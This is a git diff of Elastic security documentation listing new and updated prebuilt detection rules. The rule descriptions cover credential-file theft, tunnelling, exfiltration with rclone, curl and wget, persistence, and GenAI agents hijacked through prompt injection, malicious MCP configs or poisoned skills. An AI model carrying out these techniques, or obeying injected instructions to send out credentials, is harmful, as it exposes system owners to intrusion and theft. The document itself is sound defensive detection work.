files on a given host. 
This behavior may indicate post-exploitation credential theft via a malicious Python script, compromised dependency, or malicious model file deserialization. Legitimate Python processes do not typically access credential files such as SSH keys, AWS credentials, browser cookies, Kerberos tickets, or keychain databases, so a first occurrence is a strong indicator of compromise. | new | 1 + +|<> | Detects the first time a Python process spawns a shell on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can result in shell spawns that would not occur during normal workflows. Since legitimate Python processes rarely shell out to interactive shells, a first occurrence of this behavior on a host is a strong signal of potential compromise. | new | 1 + +|<> | Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise. | new | 1 + +|<> | Generates a detection alert for each IBM QRadar offense written to the configured indices. Enabling this rule allows you to immediately begin investigating IBM QRadar offense alerts in the app. | new | 1 + +|<> | Identifies a Windows host where two or more distinct remote monitoring and management (RMM) or remote-access tool vendors are observed starting processes within the same eight-minute window. Legitimate MSP environments may run multiple tools, but this pattern can also indicate compromise, shadow IT, or attacker staging of redundant access. Processes are mapped to a single vendor label so multiple binaries from the same vendor do not inflate the count. 
| new | 1 + +|<> | Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key. | new | 1 + +|<> | Identifies the use of Cloudflare Tunnel (cloudflared) to expose a local service or create an outbound tunnel. Adversaries may abuse quick tunnels (e.g. tunnel --url http://127.0.0.1:80) or named tunnels to proxy C2 traffic or exfiltrate data through Cloudflare's edge while evading direct connection blocking. | new | 1 + +|<> | Identifies execution of Yuze, a lightweight open-source tunneling tool used for intranet penetration. Yuze supports forward and reverse SOCKS5 proxy tunneling and is typically executed via rundll32 loading yuze.dll with the RunYuze export. Threat actors may use it to proxy C2 or pivot traffic. | new | 1 + +|<> | Detects shell executions (cmd, PowerShell, rundll32) spawned by Velociraptor. Threat actors have been observed installing Velociraptor to execute shell commands on compromised systems, blending in with legitimate system processes. | new | 1 + +|<> | Detects execution of JavaScript via Deno with suspicious command-line patterns (base64, eval, http, or import in a javascript context). Adversaries may abuse Deno to run malicious JavaScript for execution or staging. | new | 1 + +|<> | Identifies abuse of rclone (or a renamed copy, e.g. disguised as a security or backup utility) to exfiltrate data to cloud storage or remote endpoints. Rclone is a legitimate file sync tool; threat actors rename it to blend with administrative traffic and use copy/sync with cloud backends (e.g. :s3:) and include filters to exfiltrate specific file types. | new | 1 + +|<> | Detects GenAI tools connecting to unusual domains on macOS. 
Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents. | update | 4 + +|<> | Detects when GenAI tools access sensitive files such as cloud credentials, SSH keys, browser password databases, or shell configurations. Attackers leverage GenAI agents to systematically locate and exfiltrate credentials, API keys, and tokens. Access to credential stores (.aws/credentials, .ssh/id_*) suggests harvesting, while writes to shell configs (.bashrc, .zshrc) indicate persistence attempts. Note: On linux only creation events are available. Access events are not yet implemented. | update | 4 + +|<> | Identifies the Elastic endpoint agent has stopped and is no longer running on the host. Adversaries may attempt to disable security monitoring tools in an attempt to evade detection or prevention capabilities during an intrusion. This may also indicate an issue with the agent itself and should be addressed to ensure defensive measures are back in a stable state. | update | 113 + +|<> | Identifies the execution of a Python script that uses the ROT cipher for letters substitution. Adversaries may use this method to encode and obfuscate part of their malicious code in legit python packages. | update | 5 + +|<> | Detects unusual modification of GenAI tool configuration files. Adversaries may inject malicious MCP server configurations to hijack AI agents for persistence, C2, or data exfiltration. Attack vectors include malware or scripts directly poisoning config files, supply chain attacks via compromised dependencies, and prompt injection attacks that abuse the GenAI tool itself to modify its own configuration. 
Unauthorized MCP servers added to these configs execute arbitrary commands when the AI tool is next invoked. | update | 4 + +|<> | Detects when an Elastic Defend endpoint alert is generated on a host and is not followed by any subsequent endpoint telemetry (process, network, registry, library, or DNS events) within a short time window. This behavior may indicate endpoint security evasion, agent tampering, sensor disablement, service termination, system crash, or malicious interference with telemetry collection following detection. | update | 2 + +|<> | Through the new_terms rule type, this rule detects potential HTTP downgrade attacks by identifying HTTP traffic that uses a different HTTP version than the one typically used in the environment. An HTTP downgrade attack occurs when an attacker forces a connection via an older HTTP version, resulting in potentially less secure communication. For example, an attacker might downgrade a connection from HTTP/2 to HTTP/1.1 or HTTP/1.0 to exploit known vulnerabilities or weaknesses in the older protocol versions. | update | 2 + +|<> | Detects suspicious child process execution from the OpenClaw, Moltbot, or Clawdbot AI coding agents running via Node.js. These tools can execute arbitrary shell commands through skills or prompt injection attacks. Malicious skills from public registries like ClawHub have been observed executing obfuscated download-and-execute commands targeting cryptocurrency wallets and credentials. This rule identifies shells, scripting interpreters, and common LOLBins spawned by these AI agents. | update | 2 + +|<> | This rule correlates security alerts with processes exhibiting unusually high CPU utilization on the same host and process ID within a short time window. This behavior may indicate malicious activity such as malware execution, cryptomining, exploit payload execution, or abuse of system resources following initial compromise. 
| update | 4 + +|<> | Detects when a FortiGate SSL VPN login event is followed by any SIEM detection alert for the same user name within a short time window. This correlation can indicate abuse of VPN access for malicious activity, credential compromise used from a VPN session, or initial access via VPN followed by post-compromise behavior. | update | 2 + +|<> | This rule detects potential command injection attempts via web server requests by identifying URLs that contain suspicious patterns commonly associated with command execution payloads. Attackers may exploit vulnerabilities in web applications to inject and execute arbitrary commands on the server, often using interpreters like Python, Perl, Ruby, PHP, or shell commands. By monitoring for these indicators in web traffic, security teams can identify and respond to potential threats early. | update | 4 + +|<> | This rule detects potential web server discovery or fuzzing activity by identifying a high volume of HTTP GET requests resulting in 404 or 403 status codes from a single source IP address within a short timeframe. Such patterns may indicate that an attacker is attempting to discover hidden or unlinked resources on a web server, which can be a precursor to more targeted attacks. | update | 4 + +|<> | This rule detects unusual spikes in error response codes (500, 502, 503, 504) from web servers, which may indicate reconnaissance activities such as vulnerability scanning or fuzzing attempts by adversaries. These activities often generate a high volume of error responses as they probe for weaknesses in web applications. Error response codes may potentially indicate server-side issues that could be exploited. | update | 4 + +|<> | This rule detects unusual spikes in web server requests with uncommon or suspicious user-agent strings. Such activity may indicate reconnaissance attempts by attackers trying to identify vulnerabilities in web applications or servers. 
These user-agents are often associated with automated tools used for scanning, vulnerability assessment, or brute-force attacks. | update | 4 + +|<> | Identifies access to email resources via Microsoft Graph API using an first-party application on behalf of a user principal. This behavior may indicate an adversary using a phished OAuth refresh token or a Primary Refresh Token (PRT) to access email resources. The pattern includes requests to Microsoft Graph API endpoints related to email, such as /me/mailFolders/inbox/messages or /users/{user_id}/messages, using a public client application ID and a user principal object ID. This is a New Terms rule that only signals if the application ID and user principal object ID have not been seen doing this activity in the last 14 days. | update | 4 + +|<> | Identifies when a user is observed for the first time authenticating using the device code authentication workflow. This authentication workflow can be abused by attackers to phish users and steal access tokens to impersonate the victim. By its very nature, device code should only be used when logging in to devices without keyboards, where it is difficult to enter emails and passwords. This rule only applies to Entra ID user types and detects new users leveraging this flow. | update | 8 + +|<> | This New Terms rule focuses on the first occurrence of a client application ID (azure.graphactivitylogs.properties.app_id) making a request to Microsoft Graph API for a specific tenant ID (azure.tenant_id) and user principal object ID (azure.graphactivitylogs.properties.user_principal_object_id). This rule may helps identify unauthorized access or actions performed by compromised accounts. Advesaries may succesfully compromise a user's credentials and use the Microsoft Graph API to access resources or perform actions on behalf of the user. | update | 6 + +|<> | Identifies when a new Inbox forwarding rule is created in Microsoft 365. 
Inbox rules process messages in the Inbox based on conditions and take actions. In this case, the rules will forward the emails to a defined address. Attackers can abuse Inbox Rules to intercept and exfiltrate email data without making organization-wide configuration changes or having the corresponding privileges. | update | 213 + +|<> | Detects the use of curl to upload files to an internet server. Threat actors often will collect and exfiltrate data on a system to their C2 server for review. Many threat actors have been observed using curl to upload the collected data. Use of curl in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. | update | 5 + +|<> | Detects the use of wget to upload files to an internet server. Threat actors often will collect data on a system and attempt to exfiltrate it back to their command and control servers. Use of wget in this way, while not inherently malicious, should be considered highly abnormal and suspicious activity. | update | 2 + +|<> | Detects the copying of the Linux dynamic loader binary and subsequent file creation for the purpose of creating a backup copy. This technique was seen recently being utilized by Linux malware prior to patching the dynamic loader in order to inject and preload a malicious shared object file. This activity should never occur and if it does then it should be considered highly suspicious or malicious. | update | 215 + +|<> | This rule detects the loading of a kernel module from an unusual location. Threat actors may use this technique to maintain persistence on a system by loading a kernel module into the kernel namespace. This behavior is strongly related to the presence of a rootkit on the system. | update | 2 + +|<> | Adversaries may implement command and control (C2) communications that use common web services to hide their activity. 
This attack technique is typically targeted at an organization and uses web services common to the victim network, which allows the adversary to blend into legitimate traffic activity. These popular services are typically targeted since they have most likely been used before compromise, which helps malicious traffic blend in. | update | 127 + +|<> | Detects DNS queries to commonly abused remote monitoring and management (RMM) or remote access software domains from processes that are not browsers. Intended to surface RMM clients, scripts, or other non-browser activity contacting these services. | update | 3 + +|<> | Identifies downloads of executable and archive files via the Windows Background Intelligent Transfer Service (BITS). Adversaries could leverage Windows BITS transfer jobs to download remote payloads. | update | 12 + +|<> | Adversaries may install legitimate remote monitoring and management (RMM) tools or remote access software on compromised endpoints for command-and-control (C2), persistence, and execution of native commands. This rule detects when a process is started whose name or code signature (or whose parent's name or code signature) resembles commonly abused RMM/remote access tools, including first-time-seen child processes of such tools. New Terms type: host has not seen this process (or child-of-RMM pattern) before within the configured history window. | update | 116 + +|<> | Identifies powershell.exe being used to download an executable file from an untrusted remote destination. | update | 115 + +|<> | Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination. | update | 214 + +|<> | Identifies an executable or script file remotely downloaded via a TeamViewer transfer session. 
| update | 217 + +|<> | Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. | update | 110 + +|<> | Identifies multiple consecutive logon failures targeting more than one Admin account from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. | update | 118 + +|<> | Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts. | update | 118 + +|<> | Identifies attempts to clear Windows event log stores. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system. | update | 216 + +|<> | Identifies attempts to install a file from a remote server using MsiExec. Adversaries may abuse Windows Installers for initial access and delivery of malware. | update | 2 + +|<> | Identifies registry modification to the LocalAccountTokenFilterPolicy policy. If this value exists (which doesn't by default) and is set to 1, then remote connections from all local members of Administrators are granted full high-integrity tokens during negotiation. | update | 318 + +|<> | Identifies suspicious process access events from an unknown memory region. Endpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly. | update | 315 + +|<> | Identifies suspicious creation of Alternate Data Streams on highly targeted files using a script or command interpreter. 
This is uncommon for legitimate files and sometimes done by adversaries to hide malware. | update | 322 + +|<> | Identifies a process started by Notepad after opening a Markdown file. This may indicate successful exploitation of a Notepad markdown parsing vulnerability (CVE-2026-20841) that can lead to arbitrary code execution. | update | 2 + +|<> | Identifies the creation or change of a Windows executable file over network shares. Adversaries may transfer tools or other files between systems in a compromised environment. | update | 112 + +|<> | Identifies the execution of a file that was created by the virtual system process. This may indicate lateral movement via network file shares. | update | 121 + +|<> | Identifies script engines creating files in the Startup folder, or the creation of script files in the Startup folder. Adversaries may abuse this technique to maintain persistence in an environment. | update | 316 + +|<> | Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. | update | 119 + +|<> | Identifies a user account (often a service account) that normally logs in with high volume using one logon type suddenly showing successful logons using a different logon type with low count. This pattern may indicate account takeover or use of stolen credentials from a new context (e.g. interactive or network logon where only batch/service was expected). | update | 2 + +|<> | Identifies a user account that normally logs in with high volume from one source IP suddenly logging in from a different source IP. This pattern (one IP with many successful logons, another IP with very few) may indicate account takeover or use of stolen credentials from a new location. | update | 2 + +|============================================== 
diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc index c366ae5437..cb12db86fb 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-downloadable-updates.asciidoc @@ -13,6 +13,10 @@ For previous rule updates, please navigate to the https://www.elastic.co/guide/e |Update version |Date | New rules | Updated rules | Notes +|<> | 24 Mar 2026 | 25 | 44 | +This release includes new rules for Linux, Azure, MacOS, Microsoft 365, Kubernetes, AWS and Windows. New rules for Linux 365 include detection for privilege escalation, exfiltration and defense evasion. New rules for Azure include detection for initial access, credential access and initial access. New rules for MacOS include detection for credential access, persistence, and execution. New rules for Microsoft 365 include detection for defense evasion and privilege escalation. New rules for Kubernetes include detection for credential access. New rules for AWS include detection for exfiltration and execution. New rules for Windows include detection for command and control, exfiltration, and execution. Additionally, significant rule tuning for Windows, Azure, Linux, MacOS, Nginx and Fortinet rules has been added for better rule efficacy and performance. + + |<> | 11 Mar 2026 | 10 | 34 | This release includes new rules for Microsoft 365, Kubernetes, Okta and Windows. New rules for Microsoft 365 include detection for initial access, collection, discovery, credential access and defense evasion. New rules for Kubernetes include detection for privilege escalation. New rules for Windows include detection for privilege escalation, command and control and initial access. Additionally, significant rule tuning for Windows, Linux, Kubernetes, PAN-OS, Microsoft 365 and AWS rules has been added for better rule efficacy and performance. 
@@ -98,3 +102,4 @@ include::downloadable-packages/8-19-14/prebuilt-rules-8-19-14-summary.asciidoc[l include::downloadable-packages/8-19-15/prebuilt-rules-8-19-15-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-16/prebuilt-rules-8-19-16-summary.asciidoc[leveloffset=+1] include::downloadable-packages/8-19-17/prebuilt-rules-8-19-17-summary.asciidoc[leveloffset=+1] +include::downloadable-packages/8-19-18/prebuilt-rules-8-19-18-summary.asciidoc[leveloffset=+1] diff --git a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc index ebc562badb..9a148d5d76 100644 --- a/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc +++ b/docs/detections/prebuilt-rules/prebuilt-rules-reference.asciidoc 
@@ -18,6 +18,8 @@ and their rule type is `machine_learning`. |<> |Detects file creation events in the configuration directory for the APT package manager. In Linux, APT (Advanced Package Tool) is a command-line utility used for handling packages on (by default) Debian-based systems, providing functions for installing, updating, upgrading, and removing software along with managing package repositories. Attackers can backdoor APT to gain persistence by injecting malicious code into scripts that APT runs, thereby ensuring continued unauthorized access or control each time APT is used for package management. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |8 +|<> |Identifies AWS API activity originating from uncommon desktop client applications based on the user agent string. This rule detects S3 Browser and Cyberduck, which are graphical S3 management tools that provide bulk upload/download capabilities. While legitimate, these tools are rarely used in enterprise environments and have been observed in use by threat actors for data exfiltration. Any activity from these clients should be validated against authorized data transfer workflows. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS S3], [Tactic: Exfiltration], [Use Case: Threat Detection], [Resources: Investigation Guide] |None |1 + |<> |This rule identifies potentially suspicious activity by detecting instances where a single IAM user's temporary session token is accessed from multiple IP addresses within a short time frame. Such behavior may suggest that an adversary has compromised temporary credentials and is utilizing them from various locations. 
To enhance detection accuracy and minimize false positives, the rule incorporates criteria that evaluate unique IP addresses, user agents, cities, and networks. These additional checks help distinguish between legitimate distributed access patterns and potential credential misuse. Detected activities are classified into different types based on the combination of unique indicators, with each classification assigned a fidelity score reflecting the likelihood of malicious behavior. High fidelity scores are given to patterns most indicative of threats, such as multiple unique IPs, networks, cities, and user agents. Medium and low fidelity scores correspond to less severe patterns, enabling security teams to effectively prioritize alerts. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS IAM], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Use Case: Identity and Access Audit], [Resources: Investigation Guide] |None |106 |<> |Identifies multiple successive failed attempts to use denied model resources within AWS Bedrock. This could indicated attempts to bypass limitations of other approved models, or to force an impact on the environment by incurring exhorbitant costs. |[Domain: LLM], [Data Source: AWS Bedrock], [Data Source: AWS S3], [Resources: Investigation Guide], [Use Case: Policy Violation], [Mitre Atlas: T0015], [Mitre Atlas: T0034] |None |7 
@@ -34,6 +36,8 @@ and their rule type is `machine_learning`. |<> |Identifies usage of the AWS CLI from a client reporting a user agent string indicating the request was made from a Kali Linux distribution. Kali Linux is commonly used for offensive security testing and adversary tradecraft. While not inherently malicious, AWS CLI activity originating from Kali is uncommon in most production environments and may indicate compromised credentials, unauthorized access, or post-exploitation activity using valid cloud accounts. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Tactic: Initial Access], [Use Case: Cloud Threat Detection], [Resources: Investigation Guide] |None |3 +|<> |Identifies the creation of a new AWS CloudShell environment. CloudShell is a browser-based shell that provides command-line access to AWS resources directly from the AWS Management Console. The CreateEnvironment API is called when a user launches CloudShell for the first time or when accessing CloudShell in a new AWS region. Adversaries with console access may use CloudShell to execute commands, install tools, or interact with AWS services without needing local CLI credentials. Monitoring environment creation helps detect unauthorized CloudShell usage from compromised console sessions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS CloudTrail], [Data Source: AWS CloudShell], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide] |None |1 + |<> |Detects creation of a new AWS CloudTrail trail via CreateTrail API. While legitimate during onboarding or auditing improvements, adversaries can create trails that write to attacker-controlled destinations, limit regions, or otherwise subvert monitoring objectives. New trails should be validated for destination ownership, encryption, multi-region coverage, and organizational scope. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Tactic: Collection], [Resources: Investigation Guide] |None |212 |<> |Detects deletion of an AWS CloudTrail trail via DeleteTrail API. Removing trails is a high-risk action that destroys an audit control plane and is frequently paired with other destructive or stealthy operations. Validate immediately and restore compliant logging. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Data Source: AWS Cloudtrail], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |None |214 
@@ -328,6 +332,12 @@ and their rule type is `machine_learning`. |<> |Identifies unusual parent-child process relationships that can indicate malware execution or persistence mechanisms. Malicious scripts often call on other applications and processes as part of their exploit payload. For example, when a malicious Office document runs scripts as part of an exploit payload, Excel or Word may start a script interpreter process, which, in turn, runs a script that downloads and executes malware. Another common scenario is Outlook running an unusual process when malware is downloaded in an email. Monitoring and identifying anomalous process relationships is a method of detecting new and emerging malware that is not yet recognized by anti-virus scanners. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Rule Type: ML], [Rule Type: Machine Learning], [Tactic: Persistence], [Resources: Investigation Guide] |None |211 +|<> |Identifies access to AppArmor kernel policy control interfaces through the .load, .replace, or .remove files under /sys/kernel/security/apparmor/. These special files are used to load, modify, or remove AppArmor profiles and are rarely accessed during normal system activity outside of policy administration. Reads or writes to these interfaces may indicate legitimate security configuration changes, but can also reflect defense evasion, unauthorized policy tampering, or the installation of attacker-controlled profiles. This detection is especially valuable on systems where AppArmor policy changes are uncommon or tightly controlled. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |1 + +|<> |Identifies events where the AppArmor security module blocked or restricted an operation due to a policy violation. 
AppArmor enforces mandatory access control policies that limit how processes interact with system resources such as files, network sockets, and capabilities. When a process attempts an action that is not permitted by the active profile, the kernel generates a policy violation event. While these events can occur during normal operation or misconfiguration, they may also indicate attempted privilege escalation, restricted file access, or malicious activity being prevented by the system's security policy. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Resources: Investigation Guide] |None |1 + +|<> |Detects the execution of "apparmor_parser" using the "-o" option to write a compiled AppArmor profile to an output file. This functionality is normally used by system administration tools or package installation scripts when building or loading AppArmor policies. In adversarial scenarios, attackers may use "apparmor_parser" to compile custom AppArmor profiles that can later be loaded into the kernel through AppArmor policy management interfaces. Malicious profiles may weaken security controls, alter the behavior of privileged programs, or assist in exploitation chains involving AppArmor policy manipulation. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Auditd Manager], [Data Source: Elastic Defend], [Data Source: Elastic Endgame], [Data Source: Crowdstrike], [Data Source: SentinelOne], [Resources: Investigation Guide] |None |1 + |<> |Detects execution via the Apple script interpreter (osascript) followed by a network connection from the same process within a short time period. Adversaries may use malicious scripts for execution and command and control. 
|[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Command and Control], [Tactic: Execution], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |112 |<> |Identifies execution of the Apple script interpreter (osascript) without a password prompt and with administrator privileges. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Execution], [Tactic: Privilege Escalation], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |212 
@@ -374,7 +384,7 @@ and their rule type is `machine_learning`. |<> |Identifies attempts to enable the root account using the dsenableroot command. This command may be abused by adversaries for persistence, as the root account is disabled by default. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |110 -|<> |Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |109 +|<> |Detects the execution of the VScode portable binary with the tunnel command line option indicating an attempt to establish a remote tunnel session to Github or a remote VScode instance. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Command and Control], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Windows Security Event Logs], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |110 |<> |Detects attempts to install or use Kali Linux via Windows Subsystem for Linux. Adversaries may enable and use WSL for Linux to avoid detection. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Data Source: Elastic Defend], [Data Source: Windows Security Event Logs], [Data Source: Microsoft Defender for Endpoint], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Crowdstrike], [Resources: Investigation Guide] |None |214 
@@ -406,6 +416,8 @@ and their rule type is `machine_learning`. |<> |Authorization plugins are used to extend the authorization services API and implement mechanisms that are not natively supported by the OS, such as multi-factor authentication with third party software. Adversaries may abuse this feature to persist and/or collect clear text credentials as they traverse the registered plugins during user logon. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Elastic Defend], [Resources: Investigation Guide] |None |111 +|<> |Detects when a service principal or user performs an Azure Arc cluster credential listing operation from a source IP not previously associated with that identity. The `listClusterUserCredential` action retrieves credentials for the Arc Cluster Connect proxy, enabling kubectl access through the Azure ARM API. An adversary using stolen service principal credentials will typically call this operation from infrastructure not previously seen for that SP. By tracking the combination of caller identity and source IP, this rule avoids false positives from backend services and CI/CD pipelines that rotate IPs but maintain consistent identity-to-IP patterns over time. |[Domain: Cloud], [Data Source: Azure], [Data Source: Azure Arc], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Initial Access], [Tactic: Credential Access], [Resources: Investigation Guide] |None |1 + |<> |Identifies when an Azure Automation account is created. Azure Automation accounts can be used to automate management tasks and orchestrate actions across systems. An adversary may create an Automation account in order to maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Identity and Access Audit], [Tactic: Persistence], [Resources: Investigation Guide] |None |106 |<> |Identifies when an Azure Automation runbook is created or modified. 
An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment. |[Domain: Cloud], [Data Source: Azure], [Use Case: Configuration Audit], [Tactic: Execution], [Resources: Investigation Guide] |None |106 
@@ -456,6 +468,10 @@ and their rule type is `machine_learning`. |<> |Identifies the deletion of a resource group in Azure, which includes all resources within the group. Deletion is permanent and irreversible. An adversary may delete a resource group in an attempt to evade defenses or intentionally destroy data. |[Domain: Cloud], [Data Source: Azure], [Use Case: Log Auditing], [Tactic: Impact], [Resources: Investigation Guide] |None |107 +|<> |Detects when an Azure service principal authenticates from multiple countries within a short time window, which may indicate stolen credentials being used from different geographic locations. Service principals typically authenticate from consistent locations tied to their deployment infrastructure. Authentication from multiple countries in a brief period suggests credential compromise, particularly when the source countries do not align with the organization's expected operating regions. This pattern has been observed in attacks using stolen CI/CD credentials, phished service principal secrets, and compromised automation accounts. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Use Case: Identity and Access Audit], [Use Case: Threat Detection], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 + +|<> |Detects when a service principal authenticates to Microsoft Entra ID and then lists credentials for an Azure Arc-connected Kubernetes cluster within a short time window. The `listClusterUserCredential` action retrieves tokens that enable kubectl access through the Arc Cluster Connect proxy. This sequence (service principal sign-in followed by Arc credential retrieval), represents the exact attack chain used by adversaries with stolen service principal secrets to establish a proxy tunnel into Kubernetes clusters. 
Service principals that authenticate externally (as opposed to managed identities) and immediately access Arc cluster credentials warrant investigation, particularly when the sign-in originates from an unexpected location or ASN. |[Domain: Cloud], [Domain: Identity], [Data Source: Azure], [Data Source: Azure Arc], [Data Source: Microsoft Entra ID], [Data Source: Microsoft Entra ID Sign-In Logs], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Initial Access], [Resources: Investigation Guide] |None |1 + |<> |Identifies when Azure Storage Account Blob public access is enabled, allowing external access to blob containers. This technique was observed in cloud ransom-based campaigns where threat actors modified storage accounts to expose non-remotely accessible accounts to the internet for data exfiltration. Adversaries abuse the Microsoft.Storage/storageAccounts/write operation to modify public access settings. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Collection], [Resources: Investigation Guide] |None |1 |<> |Identifies when an Azure Storage Account is deleted. Adversaries may delete storage accounts to disrupt operations, destroy evidence, or cause denial of service. This activity could indicate an attacker attempting to cover their tracks after data exfiltration or as part of a destructive attack. Monitoring storage account deletions is critical for detecting potential impact on business operations and data availability. |[Domain: Cloud], [Domain: Storage], [Data Source: Azure], [Data Source: Azure Activity Logs], [Use Case: Threat Detection], [Tactic: Impact], [Resources: Investigation Guide] |None |1 
@@ -532,7 +548,7 @@ and their rule type is `machine_learning`. |<> |Identifies PowerShell.exe or Cmd.exe execution spawning from Windows Script Host processes Wscript.exe. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Execution], [Resources: Investigation Guide], [Data Source: Windows Security Event Logs], [Data Source: Sysmon], [Data Source: SentinelOne], [Data Source: Microsoft Defender for Endpoint], [Data Source: Elastic Endgame], [Data Source: Crowdstrike] |None |208 -|<> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |118 +|<> |Identifies Component Object Model (COM) hijacking via registry modification. Adversaries may establish persistence by executing malicious content triggered by hijacked references to COM objects. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Defense Evasion], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |None |119 |<> |Identifies the image load of a compression DLL. Adversaries will often compress and encrypt data in preparation for exfiltration. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |None |5 
